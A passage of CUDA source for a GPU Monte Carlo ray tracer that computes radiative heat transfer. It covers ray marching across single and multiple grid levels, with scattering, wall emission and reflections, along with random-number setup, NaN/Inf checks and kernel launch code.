rayOrigin[X] = cellOrigin[X]; rayOrigin[Y] = cellOrigin[Y] + randDblDevice(randNumStates) * Dx[Y]; rayOrigin[Z] = cellOrigin[Z] + randDblDevice(randNumStates) * Dx[Z]; break; case EAST: rayOrigin[X] = cellOrigin[X] + Dx[X]; rayOrigin[Y] = cellOrigin[Y] + randDblDevice(randNumStates) * Dx[Y]; rayOrigin[Z] = cellOrigin[Z] + randDblDevice(randNumStates) * Dx[Z]; break; case SOUTH: rayOrigin[X] = cellOrigin[X] + randDblDevice(randNumStates) * Dx[X]; rayOrigin[Y] = cellOrigin[Y]; rayOrigin[Z] = cellOrigin[Z] + randDblDevice(randNumStates) * Dx[Z]; break; case NORTH: rayOrigin[X] = cellOrigin[X] + randDblDevice(randNumStates) * Dx[X]; rayOrigin[Y] = cellOrigin[Y] + Dx[Y]; rayOrigin[Z] = cellOrigin[Z] + randDblDevice(randNumStates) * Dx[Z]; break; case BOT: rayOrigin[X] = cellOrigin[X] + randDblDevice(randNumStates) * Dx[X]; rayOrigin[Y] = cellOrigin[Y] + randDblDevice(randNumStates) * Dx[Y]; rayOrigin[Z] = cellOrigin[Z]; break; case TOP: rayOrigin[X] = cellOrigin[X] + randDblDevice(randNumStates) * Dx[X]; rayOrigin[Y] = cellOrigin[Y] + randDblDevice(randNumStates) * Dx[Y]; rayOrigin[Z] = cellOrigin[Z] + Dx[Z]; break; default: // throw InternalError("Ray::rayLocation_cellFace, 
Invalid FaceType Specified", __FILE__, __LINE__); return; } } //______________________________________________________________________ // __device__ bool has_a_boundaryDevice(const GPUIntVector &c, const GPUGridVariable<int>& celltype, BoundaryFaces &boundaryFaces){ GPUIntVector adj = c; bool hasBoundary = false; adj[0] = c[0] - 1; // west if ( celltype[adj]+1 ){ // cell type of flow is -1, so when cellType+1 isn't false, we boundaryFaces.addFace( WEST ); // know we're at a boundary hasBoundary = true; } adj[0] += 2; // east if ( celltype[adj]+1 ){ boundaryFaces.addFace( EAST ); hasBoundary = true; } adj[0] -= 1; adj[1] = c[1] - 1; // south if ( celltype[adj]+1 ){ boundaryFaces.addFace( SOUTH ); hasBoundary = true; } adj[1] += 2; // north if ( celltype[adj]+1 ){ boundaryFaces.addFace( NORTH ); hasBoundary = true; } adj[1] -= 1; adj[2] = c[2] - 1; // bottom if ( celltype[adj]+1 ){ boundaryFaces.addFace( BOT ); hasBoundary = true; } adj[2] += 2; // top if ( celltype[adj]+1 ){ boundaryFaces.addFace( TOP ); hasBoundary = true; } return (hasBoundary); } //______________________________________________________________________ // //______________________________________________________________________ __device__ void raySignStepDevice(GPUVector& sign, int cellStep[], const GPUVector& inv_direction_vector) { // get new step and sign for ( int d=0; d<3; d++){ double me = copysign((double)1.0, inv_direction_vector[d]); // +- 1 sign[d] = fmax(0.0, me); // 0, 1 cellStep[d] = int(me); } } //______________________________________________________________________ // __device__ bool containsCellDevice( GPUIntVector low, GPUIntVector high, GPUIntVector cell, const int dir) { return low[dir] <= cell[dir] && high[dir] > cell[dir]; } //______________________________________________________________________ // // used by dataOnion it will be replaced __device__ void reflect(double& fs, GPUIntVector& cur, GPUIntVector& prevCell, const double abskg, bool& in_domain, int& step, double& sign, double& ray_direction) { fs = fs * (1 - abskg); //put cur back inside the domain cur = prevCell; in_domain = true; // apply reflection condition step *= -1; // begin stepping in opposite direction sign *= -1; ray_direction *= -1; } //______________________________________________________________________ template< class T > __device__ void updateSumIDevice ( levelParams level, GPUVector& ray_direction, GPUVector& ray_origin, const GPUIntVector& origin, const GPUVector& Dx, const GPUGridVariable< T >& sigmaT4OverPi, const GPUGridVariable< T >& abskg, const GPUGridVariable<int>& celltype, double& sumI, curandState* randNumStates, RMCRT_flags RT_flags) { GPUIntVector cur = origin; GPUIntVector prevCell = cur; // Step and sign for ray marching int step[3]; // Gives +1 or -1 based on sign GPUVector sign; // is 0 for negative ray direction GPUVector inv_ray_direction = 1.0/ray_direction; #if DEBUG == 1 if( isDbgCellDevice(origin) ) { printf(" updateSumI: [%d,%d,%d] ray_dir [%g,%g,%g] ray_loc [%g,%g,%g]\n", origin.x, origin.y, origin.z,ray_direction.x, ray_direction.y, ray_direction.z, ray_origin.x, ray_origin.y, ray_origin.z); } #endif raySignStepDevice(sign, step, ray_direction); GPUPoint CC_pos = level.getCellPosition(origin); // rayDx is the distance from bottom, left, back, corner of cell to ray GPUVector rayDx; rayDx[0] = ray_origin.x - ( CC_pos.x - 0.5*Dx.x ); // this can be consolidated using GPUVector rayDx[1] = ray_origin.y - ( CC_pos.y - 0.5*Dx.y ); rayDx[2] = ray_origin.z - ( CC_pos.z - 0.5*Dx.z ); GPUVector tMax; tMax.x = 
(sign.x * Dx.x - rayDx.x) * inv_ray_direction.x; tMax.y = (sign.y * Dx.y - rayDx.y) * inv_ray_direction.y; tMax.z = (sign.z * Dx.z - rayDx.z) * inv_ray_direction.z; //Length of t to traverse one cell GPUVector tDelta; tDelta = Abs(inv_ray_direction) * Dx; //Initializes the following values for each ray bool in_domain = true; double tMax_prev = 0; double intensity = 1.0; double fs = 1.0; int nReflect = 0; // Number of reflections double optical_thickness = 0; double expOpticalThick_prev = 1.0; double rayLength = 0.0; GPUVector ray_location = ray_origin; #ifdef RAY_SCATTER double scatCoeff = RT_flags.sigmaScat; //[m^-1] !! HACK !! This needs to come from data warehouse if (scatCoeff == 0) scatCoeff = 1e-99; // avoid division by zero // Determine the length at which scattering will occur // See CCA/Components/Arches/RMCRT/PaulasAttic/MCRT/ArchesRMCRT/ray.cc double scatLength = -log( randDblExcDevice( randNumStates ) ) / scatCoeff; #endif //+++++++Begin ray tracing+++++++++++++++++++ //Threshold while loop while ( intensity > RT_flags.threshold ){ DIR dir = NONE; while (in_domain){ prevCell = cur; double disMin = -9; // Represents ray segment length. //__________________________________ // Determine which cell the ray will enter next dir = NONE; if ( tMax.x < tMax.y ){ // X < Y if ( tMax.x < tMax.z ){ // X < Z dir = X; } else { dir = Z; } } else { if( tMax.y < tMax.z ){ // Y < Z dir = Y; } else { dir = Z; } } //__________________________________ // update marching variables cur[dir] = cur[dir] + step[dir]; disMin = (tMax[dir] - tMax_prev); tMax_prev = tMax[dir]; tMax[dir] = tMax[dir] + tDelta[dir]; rayLength += disMin; ray_location.x = ray_location.x + (disMin * ray_direction.x); ray_location.y = ray_location.y + (disMin * ray_direction.y); ray_location.z = ray_location.z + (disMin * ray_direction.z); in_domain = (celltype[cur] == d_flowCell); optical_thickness += abskg[prevCell]*disMin; RT_flags.nRaySteps ++; #if ( DEBUG >= 1 ) if( isDbgCellDevice(origin) ){ printf( " cur [%d,%d,%d] prev [%d,%d,%d] ", cur.x, cur.y, cur.z, prevCell.x, prevCell.y, prevCell.z); printf( " dir %d ", dir ); printf( "tMax [%g,%g,%g] ",tMax.x,tMax.y, tMax.z); printf( "rayLoc [%g,%g,%g] ",ray_location.x,ray_location.y, ray_location.z); printf( "distanceTraveled %g tMax[dir]: %g tMax_prev: %g, Dx[dir]: %g\n",disMin, tMax[dir], tMax_prev, Dx[dir]); printf( " tDelta [%g,%g,%g] \n",tDelta.x, tDelta.y, tDelta.z); // printf( " abskg[prev] %g \t sigmaT4OverPi[prev]: %g \n",abskg[prevCell], sigmaT4OverPi[prevCell]); // printf( " abskg[cur] %g \t sigmaT4OverPi[cur]: %g \t cellType: %i\n",abskg[cur], sigmaT4OverPi[cur], celltype[cur] ); printf( " optical_thickkness %g \t rayLength: %g\n", optical_thickness, rayLength); } #endif //Eqn 3-15(see below reference) while //Third term inside the parentheses is accounted for in Inet. Chi is accounted for in Inet calc. 
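// Segment contribution to the incident intensity: sumI += (sigmaT4/pi)[prevCell] * ( exp(-tau_prev) - exp(-tau) ) * fs, where tau is the optical thickness accumulated along the ray and fs carries the energy remaining after reflections.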
double expOpticalThick = exp(-optical_thickness); sumI += sigmaT4OverPi[prevCell] * ( expOpticalThick_prev - expOpticalThick ) * fs; expOpticalThick_prev = expOpticalThick; #ifdef RAY_SCATTER if ( (rayLength > scatLength) && in_domain){ // get new scatLength for each scattering event scatLength = -log( randDblExcDevice( randNumStates ) ) / scatCoeff; ray_direction = findRayDirectionDevice( randNumStates ); inv_ray_direction = 1.0/ray_direction; // get new step and sign int stepOld = step[dir]; raySignStepDevice( sign, step, ray_direction); // if sign[dir] changes sign, put ray back into prevCell (back scattering) // a sign change only occurs when the product of old and new is negative if( step[dir] * stepOld < 0 ){ cur = prevCell; } GPUPoint CC_pos = level.getCellPosition(cur); // rayDx is the distance from bottom, left, back, corner of cell to ray rayDx[0] = ray_origin.x - ( CC_pos.x - 0.5*Dx.x ); // this can be consolidated using GPUVector rayDx[1] = ray_origin.y - ( CC_pos.y - 0.5*Dx.y ); rayDx[2] = ray_origin.z - ( CC_pos.z - 0.5*Dx.z ); tMax.x = (sign.x * Dx.x - rayDx.x) * inv_ray_direction.x; tMax.y = (sign.y * Dx.y - rayDx.y) * inv_ray_direction.y; tMax.z = (sign.z * Dx.z - rayDx.z) * inv_ray_direction.z; // Length of t to traverse one cell tDelta = Abs(inv_ray_direction) * Dx; tMax_prev = 0; rayLength = 0; // allow for multiple scattering events per ray #if (DEBUG == 3) if( isDbgCellDevice( origin) ){ printf( " Scatter: [%i, %i, %i], rayLength: %g, tmax: %g, %g, %g tDelta: %g, %g, %g ray_dir: %g, %g, %g\n",cur.x, cur.y, cur.z,rayLength, tMax[0], tMax[1], tMax[2], tDelta.x, tDelta.y , tDelta.z, ray_direction.x, ray_direction.y , ray_direction.z); printf( " dir: %i sign: [%g, %g, %g], step [%i, %i, %i] cur: [%i, %i, %i], prevCell: [%i, %i, %i]\n", dir, sign[0], sign[1], sign[2], step[0], step[1], step[2], cur[0], cur[1], cur[2], prevCell[0], prevCell[1], prevCell[2] ); printf( " ray_location: [%g, %g, %g]\n", rayLocation[0], rayLocation[1], rayLocation[2] ); // printf(" rayDx [%g, %g, %g] CC_pos[%g, %g, %g]\n", rayDx[0], rayDx[1], rayDx[2], CC_pos.x, CC_pos.y, CC_pos.z); } #endif } #endif } //end domain while loop. // wall emission 12/15/11 double wallEmissivity = abskg[cur]; if (wallEmissivity > 1.0){ // Ensure wall emissivity doesn't exceed one. wallEmissivity = 1.0; } intensity = exp(-optical_thickness); sumI += wallEmissivity * sigmaT4OverPi[cur] * intensity; intensity = intensity * fs; // when a ray reaches the end of the domain, we force it to terminate. if( !RT_flags.allowReflect ){ intensity = 0; } #if DEBUG >0 if( isDbgCellDevice(origin) ){ printf( " cur [%d,%d,%d] intensity: %g expOptThick: %g, fs: %g allowReflect: %i \n", cur.x, cur.y, cur.z, intensity, exp(-optical_thickness), fs, RT_flags.allowReflect ); } #endif //__________________________________ // Reflections if ( (intensity > RT_flags.threshold) && RT_flags.allowReflect){ reflect( fs, cur, prevCell, abskg[cur], in_domain, step[dir], sign[dir], ray_direction[dir]); ++nReflect; } } // threshold while loop. 
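// sumI now holds the intensity gathered along the full ray path, including wall emission and any reflected segments.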
} // end of updateSumI function //______________________________________________________________________ // Multi-level template< class T> __device__ void updateSumI_MLDevice ( GPUVector& ray_direction, GPUVector& ray_origin, const GPUIntVector& origin, gridParams gridP, const GPUIntVector& fineLevel_ROI_Lo, const GPUIntVector& fineLevel_ROI_Hi, const int3* regionLo, const int3* regionHi, const GPUGridVariable< T >* sigmaT4OverPi, const GPUGridVariable< T >* abskg, const GPUGridVariable<int>* cellType, double& sumI, curandState* randNumStates, RMCRT_flags RT_flags ) { int maxLevels = gridP.maxLevels; // for readability int L = maxLevels - 1; // finest level int prevLev = L; GPUIntVector cur = origin; GPUIntVector prevCell = cur; // Step and sign for ray marching int step[3]; // Gives +1 or -1 based on sign GPUVector sign; GPUVector inv_ray_direction = 1.0 / ray_direction; #if DEBUG == 1 if( isDbgCellDevice(origin) ) { printf(" updateSumI_ML: [%d,%d,%d] ray_dir [%g,%g,%g] ray_loc [%g,%g,%g]\n", origin.x, origin.y, origin.z,ray_direction.x, ray_direction.y, ray_direction.z, ray_origin.x, ray_origin.y, ray_origin.z); } #endif raySignStepDevice(sign, step, inv_ray_direction); //__________________________________ // define tMax & tDelta on all levels // go from finest to coarset level so you can compare // with 1L rayTrace results. GPUPoint CC_posOrigin = d_levels[L].getCellPosition(origin); // rayDx is the distance from bottom, left, back, corner of cell to ray GPUVector rayDx; GPUVector Dx = d_levels[L].Dx; rayDx[0] = ray_origin.x - ( CC_posOrigin.x - 0.5*Dx.x ); // this can be consolidated using GPUVector rayDx[1] = ray_origin.y - ( CC_posOrigin.y - 0.5*Dx.y ); rayDx[2] = ray_origin.z - ( CC_posOrigin.z - 0.5*Dx.z ); GPUVector tMaxV; tMaxV.x = (sign.x * Dx.x - rayDx.x) * inv_ray_direction.x; tMaxV.y = (sign.y * Dx.y - rayDx.y) * inv_ray_direction.y; tMaxV.z = (sign.z * Dx.z - rayDx.z) * inv_ray_direction.z; GPUVector tDelta[d_MAXLEVELS]; for (int Lev = maxLevels - 1; Lev > -1; Lev--) { //Length of t to traverse one cell tDelta[Lev].x = fabs(inv_ray_direction[0]) * d_levels[Lev].Dx.x; tDelta[Lev].y = fabs(inv_ray_direction[1]) * d_levels[Lev].Dx.y; tDelta[Lev].z = fabs(inv_ray_direction[2]) * d_levels[Lev].Dx.z; } //Initializes the following values for each ray bool in_domain = true; GPUVector tMaxV_prev = make_double3(0.0,0.0,0.0); double old_length = 0.0; double intensity = 1.0; double fs = 1.0; int nReflect = 0; // Number of reflections bool onFineLevel = true; double optical_thickness = 0; double expOpticalThick_prev = 1.0; double rayLength = 0.0; GPUVector ray_location = ray_origin; GPUPoint CC_pos = CC_posOrigin; //______________________________________________________________________ // Threshold loop while (intensity > RT_flags.threshold) { DIR dir = NONE; while (in_domain) { prevCell = cur; prevLev = L; //__________________________________ // Determine the princple direction the ray is traveling // dir = NONE; if (tMaxV.x < tMaxV.y) { // X < Y if (tMaxV.x < tMaxV.z) { // X < Z dir = X; } else { dir = Z; } } else { if (tMaxV.y < tMaxV.z) { // Y < Z dir = Y; } else { dir = Z; } } // next cell index and position cur[dir] = cur[dir] + step[dir]; //__________________________________ // Logic for moving between levels // - Currently you can only move from fine to coarse level // - Don't jump levels if ray is at edge of domain CC_pos = d_levels[L].getCellPosition(cur); in_domain = gridP.domain_BB.inside(CC_pos); // position could be outside of domain bool ray_outside_ROI = ( 
containsCellDevice(fineLevel_ROI_Lo, fineLevel_ROI_Hi, cur, dir) == false ); bool ray_outside_Region = ( containsCellDevice(regionLo[L], regionHi[L], cur, dir) == false ); bool jumpFinetoCoarserLevel = ( onFineLevel && ray_outside_ROI && in_domain ); bool jumpCoarsetoCoarserLevel = ( (onFineLevel == false) && ray_outside_Region && (L > 0) && in_domain ); //#define ML_DEBUG #if ( (DEBUG == 1 || DEBUG == 4) && defined(ML_DEBUG) ) if( isDbgCellDevice(origin) ) { printf( " Ray: [%i,%i,%i] **jumpFinetoCoarserLevel %i jumpCoarsetoCoarserLevel %i containsCell: %i ", cur.x, cur.y, cur.z, jumpFinetoCoarserLevel, jumpCoarsetoCoarserLevel, containsCellDevice(fineLevel_ROI_Lo, fineLevel_ROI_Hi, cur, dir)); printf( " onFineLevel: %i ray_outside_ROI: %i ray_outside_Region: %i in_domain: %i\n", onFineLevel, ray_outside_ROI, ray_outside_Region,in_domain ); printf( " L: %i regionLo: [%i,%i,%i], regionHi: [%i,%i,%i]\n",L,regionLo[L].x,regionLo[L].y,regionLo[L].z, regionHi[L].x,regionHi[L].y,regionHi[L].z); } #endif if (jumpFinetoCoarserLevel) { cur = d_levels[L].mapCellToCoarser(cur); L = d_levels[L].getCoarserLevelIndex(); // move to a coarser level onFineLevel = false; #if ( (DEBUG == 1 || DEBUG == 4) && defined(ML_DEBUG) ) if( isDbgCellDevice(origin) ) { printf( " ** Jumping off fine patch switching Levels: prev L: %i, L: %i, cur: [%i,%i,%i] \n",prevLev, L, cur.x, cur.y, cur.z); } #endif } else if (jumpCoarsetoCoarserLevel) { //GPUIntVector c_old = cur; // needed for debugging cur = d_levels[L].mapCellToCoarser(cur); L = d_levels[L].getCoarserLevelIndex(); // move to a coarser level #if ( (DEBUG == 1 || DEBUG == 4) && defined(ML_DEBUG) ) if( isDbgCellDevice(origin) ) { printf( " ** Switching Levels: prev L: %i, L: %i, cur: [%i,%i,%i], c_old: [%i,%i,%i]\n",prevLev, L, cur.x, cur.y, cur.z, c_old.x, c_old.y, c_old.z); } #endif } //__________________________________ // update marching variables double distanceTraveled = (tMaxV[dir] - old_length); old_length = tMaxV[dir]; tMaxV_prev = tMaxV; tMaxV[dir] = tMaxV[dir] + tDelta[L][dir]; ray_location.x = ray_location.x + ( distanceTraveled * ray_direction.x ); ray_location.y = ray_location.y + ( distanceTraveled * ray_direction.y ); ray_location.z = ray_location.z + ( distanceTraveled * ray_direction.z ); //__________________________________ // when moving to a coarse level tmax will change only in the direction the ray is moving if ( jumpFinetoCoarserLevel || jumpCoarsetoCoarserLevel ){ GPUVector dx = d_levels[L].Dx; double rayDx_Level = ray_location[dir] - ( CC_pos[dir] - 0.5*dx[dir] ); double tMax_tmp = ( sign[dir] * dx[dir] - rayDx_Level ) * inv_ray_direction[dir]; tMaxV = tMaxV_prev; tMaxV[dir] += tMax_tmp; #if DEBUG >0 if( isDbgCellDevice(origin) ) { printf(" Jumping from fine to coarse level: rayDxLevel: %g tmax_tmp: %g dir: %i, CC_pos[dir] %g\n", rayDx_Level, tMax_tmp,dir, CC_pos[dir]); } #endif } // if the cell isn't a flow cell then terminate the ray in_domain = in_domain && (cellType[L][cur] == d_flowCell) ; rayLength += distanceTraveled; optical_thickness += abskg[prevLev][prevCell] * distanceTraveled; double expOpticalThick = exp(-optical_thickness); #if DEBUG == 1 // This sucks --Todd if( isDbgCellDevice(origin) ) { printf( " cur [%d,%d,%d] prev [%d,%d,%d]", cur.x, cur.y, cur.z, prevCell.x, prevCell.y, prevCell.z); printf( " dir %d ", dir ); // printf( " stepSize [%i,%i,%i] ",step[0],step[1],step[2]); printf( "tMaxV [%g,%g,%g] ", tMaxV[0],tMaxV[1], tMaxV[2]); printf( "rayLoc [%4.5f,%4.5f,%4.5f] ",ray_location.x,ray_location.y, ray_location.z); 
printf( "\tdistanceTraveled %4.5f tMaxV[dir]: %g tMaxV_prev[dir]: %g , Dx[dir]: %g\n",distanceTraveled, tMaxV[dir], tMaxV_prev[dir], d_levels[L].Dx[dir]); printf( " tDelta [%g,%g,%g] \n",tDelta[L].x,tDelta[L].y, tDelta[L].z); // printf( "inv_dir [%g,%g,%g] ",inv_direction.x(),inv_direction.y(), inv_direction.z()); // printf( " abskg[prev] %g \t sigmaT4OverPi[prev]: %g \n",abskg[prevLev][prevCell], sigmaT4OverPi[prevLev][prevCell]); // printf( " abskg[cur] %g \t sigmaT4OverPi[cur]: %g \t cellType: %i \n",abskg[L][cur], sigmaT4OverPi[L][cur], cellType[L][cur]); // printf( " Dx[prevLev].x %g \n", Dx[prevLev].x() ); printf( " optical_thickkness %g \t rayLength: %g \tSumI %g\n", optical_thickness, rayLength, sumI); } #endif sumI += sigmaT4OverPi[prevLev][prevCell] * (expOpticalThick_prev - expOpticalThick) * fs; expOpticalThick_prev = expOpticalThick; } //end domain while loop. ++++++++++++++ //__________________________________ // double wallEmissivity = abskg[L][cur]; if (wallEmissivity > 1.0) { // Ensure wall emissivity doesn't exceed one. wallEmissivity = 1.0; } intensity = exp(-optical_thickness); sumI += wallEmissivity * sigmaT4OverPi[L][cur] * intensity; intensity = intensity * fs; // when a ray reaches the end of the domain, we force it to terminate. if (!RT_flags.allowReflect){ intensity = 0; } #if DEBUG == 1 if( isDbgCellDevice(origin) ) { printf( " C) intensity: %g OptThick: %g, fs: %g allowReflect: %i\n", intensity, optical_thickness, fs, RT_flags.allowReflect ); } #endif //__________________________________ // Reflections if ((intensity > RT_flags.threshold) && RT_flags.allowReflect) { reflect(fs, cur, prevCell, abskg[L][cur], in_domain, step[dir], sign[dir], ray_direction[dir]); ++nReflect; } } // threshold while loop. } // end of updateSumI function //______________________________________________________________________ // Returns random number between 0 & 1.0 including 0 & 1.0 // See src/Core/Math/MersenneTwister.h for equation //______________________________________________________________________ __device__ double randDblDevice(curandState* globalState) { int blockId = blockIdx.x + blockIdx.y * gridDim.x + gridDim.x * gridDim.y * blockIdx.z; int tid = blockId * blockDim.x * blockDim.y * blockDim.z + threadIdx.z * blockDim.y * blockDim.x + threadIdx.y * blockDim.x + threadIdx.x; curandState localState = globalState[tid]; double val = curand(&localState); globalState[tid] = localState; #ifdef FIXED_RANDOM_NUM return 0.3; #else return (double)val * (1.0/4294967295.0); #endif } //______________________________________________________________________ // Returns random number between 0 & 1.0 excluding 0 & 1.0 // See src/Core/Math/MersenneTwister.h for equation //______________________________________________________________________ __device__ double randDblExcDevice(curandState* globalState) { int tid = threadIdx.x + blockDim.x * threadIdx.y + (blockDim.x * blockDim.y) * threadIdx.z; curandState localState = globalState[tid]; double val = curand(&localState); globalState[tid] = localState; #ifdef FIXED_RANDOM_NUM return 0.3; #else return ( (double)val + 0.5 ) * (1.0/4294967296.0); #endif } //______________________________________________________________________ // Returns random integer in [0,n] // rnd_integer_from_A_to_B = A + curand() * (B-A); // A = 0 //______________________________________________________________________ __device__ int randIntDevice(curandState* globalState, const int B ) { double val = randDblDevice( globalState ); return val * B; } 
//______________________________________________________________________
//  Each thread gets the same seed, a different sequence number, and no offset.
//  This will create repeatable results.
__device__ void setupRandNumsSeedAndSequences(curandState* randNumStates,
                                              int numStates,
                                              unsigned long long patchID,
                                              unsigned long long curTimeStep)
{
  // Generate random numbers using curand_init().

  // Format is curand_init(seed, sequence, offset, state);

  // Note, it seems a very large sequence really slows things down (bits in the high order region).
  // I measured kernels taking an additional 300 milliseconds due to it!  So the sequence is kept
  // small, using lower order bits only, and instead the seed is given a number with bits in both the
  // high order and low order regions.

  // Unfortunately this isn't perfect.  "Sequences generated with different seeds
  // usually do not have statistically correlated values, but some choices of seeds may give
  // statistically correlated sequences. Sequences generated with the same seed and different
  // sequence numbers will not have statistically correlated values." from here:
  // http://docs.nvidia.com/cuda/curand/device-api-overview.html#axzz4SPy8xMuj

  // For RMCRT we will take the tradeoff of possibly having statistically correlated values over
  // the 300 millisecond hit.

  // Generate what should be a unique seed.  To get a unique number the code below computes a tID
  // which is a combination of a patchID, threadID, and the current timestep.
  // This uses the left 20 bits from the patchID, the next 20 bits from the curTimeStep
  // and the last 24 bits from the indexId.  Combined that should be unique.

  // Standard CUDA way of computing a threadID
  int blockId = blockIdx.x + blockIdx.y * gridDim.x + gridDim.x * gridDim.y * blockIdx.z;
  int threadId = blockId * blockDim.x * blockDim.y * blockDim.z
               + threadIdx.z * blockDim.y * blockDim.x
               + threadIdx.y * blockDim.x
               + threadIdx.x;

  unsigned long long tID = (((patchID & 0xFFFFF) << 44) | ((curTimeStep & 0xFFFFF) << 24) | (threadId & 0xFFFFFF));

  curand_init(tID, threadId, 0, &randNumStates[threadId]);

  // If you want to take the 300 millisecond hit, use this line below instead.
  //curand_init(1234, tID, 0, &randNumStates[threadId]);
}

//______________________________________________________________________
//  is cell a debug cell
__device__ bool isDbgCellDevice( GPUIntVector me )
{
  int size = 2;
  GPUIntVector dbgCell[2];
  dbgCell[0] = make_int3(0,0,0);
  dbgCell[1] = make_int3(5,5,5);

  for (int i = 0; i < size; i++) {
    if( me == dbgCell[i]){
      return true;
    }
  }
  return false;
}
//______________________________________________________________________
//
// Math.h has an std::isnan and std::isinf.  CUDA has an isnan and isinf macro (not in a namespace, and not a function).
// This .cu file sees both, so trying to use the CUDA isnan gives compiler ambiguity errors.
// Dan Sutherland with Sandia said they solved this problem by using their own isnan and isinf.
// So here is the code for that.  They're also renamed to isNan and isInf to keep things separate.
//(Code was found at http://stackoverflow.com/questions/2249110/how-do-i-make-a-portable-isnan-isinf-function
//and adapted from https://github.com/Itseez/opencv/blob/3.0.0/modules/hal/include/opencv2/hal/defs.h#L447 )
typedef unsigned long long uint64;

__device__ int isInf(double x)
{
  union { uint64 u; double f; } ieee754;
  ieee754.f = x;
  return ( (unsigned)(ieee754.u >> 32) & 0x7fffffff ) == 0x7ff00000 &&
         ( (unsigned)ieee754.u == 0 );
}

__device__ int isNan(double x)
{
  union { uint64 u; double f; } ieee754;
  ieee754.f = x;
  return ( (unsigned)(ieee754.u >> 32) & 0x7fffffff ) +
         ( (unsigned)ieee754.u != 0 ) > 0x7ff00000;
}

__device__ int isInf( float value )
{
  // Inspect the 32-bit float pattern directly; routing the value through a double union would
  // never match the single-precision infinity pattern 0x7f800000.
  union { unsigned int u; float f; } ieee754;
  ieee754.f = value;
  return (ieee754.u & 0x7fffffff) == 0x7f800000;
}

__device__ int isNan( float value )
{
  // Same 32-bit union as isInf(float): a NaN has all exponent bits set and a non-zero mantissa.
  union { unsigned int u; float f; } ieee754;
  ieee754.f = value;
  return (ieee754.u & 0x7fffffff) > 0x7f800000;
}

//______________________________________________________________________
//  Perform some sanity checks on the Variable.  This is for debugging.
template< class T>
__device__ void GPUVariableSanityCK(const GPUGridVariable<T>& Q,
                                    const GPUIntVector Lo,
                                    const GPUIntVector Hi)
{
#if SCI_ASSERTION_LEVEL > 0
  if (isThread0()) {
    GPUIntVector varLo = Q.getLowIndex();
    GPUIntVector varHi = Q.getHighIndex();

    if( Lo < varLo || varHi < Hi){
      printf ( "ERROR: GPUVariableSanityCK \n");
      printf("  Variable:          varLo:[%i,%i,%i], varHi[%i,%i,%i]\n", varLo.x, varLo.y, varLo.z, varHi.x, varHi.y, varHi.z);
      printf("  Requested extents: varLo:[%i,%i,%i], varHi[%i,%i,%i]\n", Lo.x, Lo.y, Lo.z, Hi.x, Hi.y, Hi.z);
      printf("  Now exiting...");
      __threadfence();
      asm("trap;");
    }

    for (int i = Lo.x; i < Hi.x; i++) {
      for (int j = Lo.y; j < Hi.y; j++) {
        for (int k = Lo.z; k < Hi.z; k++) {
          GPUIntVector idx = make_int3(i, j, k);
          T me = Q[idx];
          if ( isNan(me) || isInf(me)){
            printf ( "isNan or isInf was detected at [%i,%i,%i]\n", i,j,k);
            printf("  Now exiting...");
            __threadfence();
            asm("trap;");
          }
        }  // k loop
      }  // j loop
    }  // i loop
  }  // thread0
#endif
}

template __device__ void GPUVariableSanityCK(const GPUGridVariable<float>& Q, const GPUIntVector Lo, const GPUIntVector Hi);
template __device__ void GPUVariableSanityCK(const GPUGridVariable<double>& Q, const GPUIntVector Lo, const GPUIntVector Hi);

//______________________________________________________________________
//
template< class T>
__host__ void launchRayTraceKernel(DetailedTask* dtask,
                                   dim3 dimGrid,
                                   dim3 dimBlock,
                                   const int matlIndx,
                                   levelParams level,
                                   patchParams patch,
                                   cudaStream_t* stream,
                                   RMCRT_flags RT_flags,
                                   int curTimeStep,
                                   GPUDataWarehouse* abskg_gdw,
                                   GPUDataWarehouse* sigmaT4_gdw,
                                   GPUDataWarehouse* cellType_gdw,
                                   GPUDataWarehouse* old_gdw,
                                   GPUDataWarehouse* new_gdw)
{
  // setup random number generator states on the device, 1 for each thread
  curandState* randNumStates;
  int numStates = dimGrid.x * dimGrid.y * dimGrid.z * dimBlock.x * dimBlock.y * dimBlock.z;

  randNumStates = (curandState*)GPUMemoryPool::allocateCudaSpaceFromPool(0, numStates * sizeof(curandState));
  dtask->addTempCudaMemoryToBeFreedOnCompletion(0, randNumStates);

  // Create a host array, load it with data, and send it over to the GPU
  int nRandNums = 512;
  double* d_debugRandNums;
  size_t randNumsByteSize = nRandNums * sizeof(double);
  d_debugRandNums = (double*)GPUMemoryPool::allocateCudaSpaceFromPool(0, randNumsByteSize);
  dtask->addTempCudaMemoryToBeFreedOnCompletion(0, d_debugRandNums);

  // Making sure we have kernel/mem copy overlapping
  double* h_debugRandNums = new double[nRandNums];
cudaHostRegister(h_debugRandNums, randNumsByteSize, cudaHostRegisterPortable); //perform computations here on h_debugRandNums for (int i = 0; i < nRandNums; i++) { h_debugRandNums[i] = i; } dtask->addTempHostMemoryToBeFreedOnCompletion(h_debugRandNums); cudaMemcpyAsync(d_debugRandNums, h_debugRandNums, randNumsByteSize, cudaMemcpyHostToDevice, *stream ); rayTraceKernel< T ><<< dimGrid, dimBlock, 0, *stream >>>( dimGrid, dimBlock, matlIndx, level, patch, randNumStates, RT_flags, curTimeStep, abskg_gdw, sigmaT4_gdw, cellType_gdw, old_gdw, new_gdw); #if DEBUG > 0 cudaDeviceSynchronize(); // so printF will work #endif } //______________________________________________________________________ // template< class T> __host__ void launchRayTraceDataOnionKernel( DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, int matlIndex, patchParams patch, gridParams gridP, levelParams* levelP, GPUIntVector fineLevel_ROI_Lo, GPUIntVector fineLevel_ROI_Hi, cudaStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ) { // copy regionLo & regionHi to device memory int maxLevels = gridP.maxLevels; int3* dev_regionLo; int3* dev_regionHi; size_t size = d_MAXLEVELS * sizeof(int3); dev_regionLo = (int3*)GPUMemoryPool::allocateCudaSpaceFromPool(0, size); dev_regionHi = (int3*)GPUMemoryPool::allocateCudaSpaceFromPool(0, size); dtask->addTempCudaMemoryToBeFreedOnCompletion(0, dev_regionLo); dtask->addTempCudaMemoryToBeFreedOnCompletion(0, dev_regionHi); //More GPU stuff to allow kernel/copy overlapping int3 * myLo = new int3[d_MAXLEVELS]; cudaHostRegister(myLo, sizeof(int3) * d_MAXLEVELS, cudaHostRegisterPortable); int3 * myHi = new int3[d_MAXLEVELS]; cudaHostRegister(myHi, sizeof(int3) * d_MAXLEVELS, cudaHostRegisterPortable); 